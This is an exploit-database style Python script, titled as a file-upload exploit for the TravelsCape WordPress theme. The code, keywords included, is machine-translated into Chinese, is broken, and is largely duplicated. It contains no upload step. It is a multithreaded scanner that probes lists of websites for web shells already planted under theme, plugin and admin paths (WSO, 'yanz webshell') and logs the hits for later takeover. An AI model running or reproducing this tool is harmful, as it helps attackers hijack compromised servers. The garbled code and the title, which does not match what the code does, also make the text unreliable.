#利用标题: WordPress主题TravelsCape v1.0.3-任意文件上传
#日期: 2024-04-01
#作者: Milad Karimi(Ex3ptional)
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统
导入OS.Path
导入请求
导入
导入urllib3
从请求。
从多处理。dummyImport Pool作为threadpool
从Colorama进口,初始
init(autoret=true)
error_color=fore.red
info_color=fore.cyan
success_color=fore.green
righlight_color=fore.magenta
requests.urllib3.disable_warnings()
标题={
'Connection':'keep-alive',
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozilla/5.0(Linux; Android 7.0; SM-G892A构建/NRD90M;
WV)AppleWebkit/537.36(Khtml,像壁虎一样)版本/4.0 Chrome/60.0.3112.107
移动野生动物园/537.36',
'Accept':
'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'接受编码:'gzip,deflate',
'Accept-Language':'En-us,en; q=0.9,fr; q=0.8',
'Referer':'www.google.com'
}
DEF URLDOMAIN(URL):
如果url.startswith('http://'):
url=url.replace('http://','')
Elif url.startswith('https://'):
url=url.replace('https://','')
如果在url:中'/'
url=url.split('/')[0]
返回URL
def check_security(url):
fg=success_color
fr=error_color
TRY:
url='http://' + urldomain(url)
check=requests.get(url +
'/wp-content/themes/travelscape/json.php',标头=标题,
laster_redirects=true,超时=15)
如果在check.text:中'MSQ_403'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('MSQ_403.TXT','a')。写(url +
'/wp-content/themes/travelscape/json.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +
'/wp-content/themes/aahana/json.php',标头=标题,
allow_redirects=true,验证=false,timeout=15)
如果在check.text:中'MSQ_403'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('MSQ_403.TXT','a')。写(url +
'/wp-content/themes/aahana/json.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
check=requests.get(url +'/wp-content/themes/travel/issue.php',
标题=标题,允许_redirects=true,超时=15)
如果“ yanz webshell!”在check.text:中
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +
'/wp-content/themes/travel/issue.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +'/about.php',标头=标题,
laster_redirects=true,超时=15)
如果“ yanz webshell!”在check.text:中
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +'/about.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +
'/wp-content/themes/digital-download/new.php',标头=标题,
laster_redirects=true,超时=15)
如果在check.text:中'#0x2525'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('Digital-download.txt','a')。写(url +
'/wp-content/themes/digital-download/new.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
url='http://' + urldomain(url)
check=requests.get(url +'/epinyins.php',标头=标题,
laster_redirects=true,超时=15)
如果在check.text:中'uname:'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +'/epinyins.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
url='https://' + urldomain(url)
check=requests.get(url +'/wp-admin/dropdown.php',
标题=标题,允许_redirects=true,verify=false,timeout=15)
如果在check.text:中'uname:'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +'/wp-admin/dropdown.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +
'/wp-content/plugins/dummyymy/wp-signup.php',标头=标题,
allow_redirects=true,验证=false,timeout=15)
如果check.text:中的“简单壳”
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('dummyymy.txt','a')。写(url +
'/wp-content/plugins/dummyymy/wp-signup.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
除异常外,E:
print(f' - | {url} - {fr} [失败]由于: {e}')
def main():
TRY:
url_file_path=sys.argv [1]
除了IndexError:
url_file_path=input(f'{info_color}输入文件的路径
包含URLS:')
如果不是OS.Path.Iffile(url_file_path):
print(f'{error_color} [错误]指定的文件路径为
无效的。')
sys.exit(1)
TRY:
urls_to_check=[line.strip()for open中的行(url_file_path,'r',
编码='utf-8')。readlines()]
除异常外,E:
print(f'{error_color} [错误]阅读时发生了错误
file: {e}')
sys.exit(1)
pool=threadpool(20)
pool.map(check_security,urls_to_check)
pool.close()
pool.join()
打印(f'{info_color}安全检查过程成功完成。
结果保存在相应的文件中。”)
如果name=='__ -Main __':
主要的()
#日期: 2024-04-01
#作者: Milad Karimi(Ex3ptional)
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统
导入OS.Path
导入请求
导入
导入urllib3
从请求。
从多处理。dummyImport Pool作为threadpool
从Colorama进口,初始
init(autoret=true)
error_color=fore.red
info_color=fore.cyan
success_color=fore.green
righlight_color=fore.magenta
requests.urllib3.disable_warnings()
标题={
'Connection':'keep-alive',
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozilla/5.0(Linux; Android 7.0; SM-G892A构建/NRD90M;
WV)AppleWebkit/537.36(Khtml,像壁虎一样)版本/4.0 Chrome/60.0.3112.107
移动野生动物园/537.36',
'Accept':
'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'接受编码:'gzip,deflate',
'Accept-Language':'En-us,en; q=0.9,fr; q=0.8',
'Referer':'www.google.com'
}
DEF URLDOMAIN(URL):
如果url.startswith('http://'):
url=url.replace('http://','')
Elif url.startswith('https://'):
url=url.replace('https://','')
如果在url:中'/'
url=url.split('/')[0]
返回URL
def check_security(url):
fg=success_color
fr=error_color
TRY:
url='http://' + urldomain(url)
check=requests.get(url +
'/wp-content/themes/travelscape/json.php',标头=标题,
laster_redirects=true,超时=15)
如果在check.text:中'MSQ_403'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('MSQ_403.TXT','a')。写(url +
'/wp-content/themes/travelscape/json.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +
'/wp-content/themes/aahana/json.php',标头=标题,
allow_redirects=true,验证=false,timeout=15)
如果在check.text:中'MSQ_403'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('MSQ_403.TXT','a')。写(url +
'/wp-content/themes/aahana/json.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
check=requests.get(url +'/wp-content/themes/travel/issue.php',
标题=标题,允许_redirects=true,超时=15)
如果“ yanz webshell!”在check.text:中
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +
'/wp-content/themes/travel/issue.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +'/about.php',标头=标题,
laster_redirects=true,超时=15)
如果“ yanz webshell!”在check.text:中
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +'/about.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +
'/wp-content/themes/digital-download/new.php',标头=标题,
laster_redirects=true,超时=15)
如果在check.text:中'#0x2525'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('Digital-download.txt','a')。写(url +
'/wp-content/themes/digital-download/new.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
url='http://' + urldomain(url)
check=requests.get(url +'/epinyins.php',标头=标题,
laster_redirects=true,超时=15)
如果在check.text:中'uname:'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +'/epinyins.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
url='https://' + urldomain(url)
check=requests.get(url +'/wp-admin/dropdown.php',
标题=标题,允许_redirects=true,verify=false,timeout=15)
如果在check.text:中'uname:'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +'/wp-admin/dropdown.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +
'/wp-content/plugins/dummyymy/wp-signup.php',标头=标题,
allow_redirects=true,验证=false,timeout=15)
如果check.text:中的“简单壳”
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('dummyymy.txt','a')。写(url +
'/wp-content/plugins/dummyymy/wp-signup.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
除异常外,E:
print(f' - | {url} - {fr} [失败]由于: {e}')
def main():
TRY:
url_file_path=sys.argv [1]
除了IndexError:
url_file_path=input(f'{info_color}输入文件的路径
包含URLS:')
如果不是OS.Path.Iffile(url_file_path):
print(f'{error_color} [错误]指定的文件路径为
无效的。')
sys.exit(1)
TRY:
urls_to_check=[line.strip()for open中的行(url_file_path,'r',
编码='utf-8')。readlines()]
除异常外,E:
print(f'{error_color} [错误]阅读时发生了错误
file: {e}')
sys.exit(1)
pool=threadpool(20)
pool.map(check_security,urls_to_check)
pool.close()
pool.join()
打印(f'{info_color}安全检查过程成功完成。
结果保存在相应的文件中。”)
如果name=='__ -Main __':
主要的()
